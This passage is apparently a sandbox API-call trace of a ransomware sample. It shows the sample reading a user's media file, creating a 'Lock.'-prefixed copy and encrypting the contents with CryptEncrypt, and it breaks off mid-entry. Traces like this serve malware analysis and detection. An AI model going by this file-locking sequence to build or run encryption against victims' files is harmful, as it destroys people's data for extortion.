RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0238.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.391] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/R2j101Rhh.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\r2j101rhh.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0238.391] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.391] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0238.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0238.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0238.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.R2j101Rhh.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.r2j101rhh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0238.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0238.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.451] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0238.451] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x3eb0, lpOverlapped=0x0) returned 1 [0238.453] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0238.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x3bf0dd8 [0238.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0238.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x2f14818 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0238.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.458] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x3bf0dd8 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0238.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0238.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0238.459] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0238.460] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0238.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0238.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x3bf0dd8 [0238.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0238.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0238.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fd8 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0238.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3eb0) returned 0x2f186d0 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.464] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0238.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0238.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.464] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0238.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.464] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0238.464] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0238.465] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0238.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0238.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.465] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.465] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0238.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.465] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0238.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0238.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0238.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.466] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0238.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0238.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.467] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f350 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0238.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0238.468] CryptEncrypt (in: hKey=0xa87690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3eb0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3eb8) returned 1 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0238.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0238.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0238.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0238.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 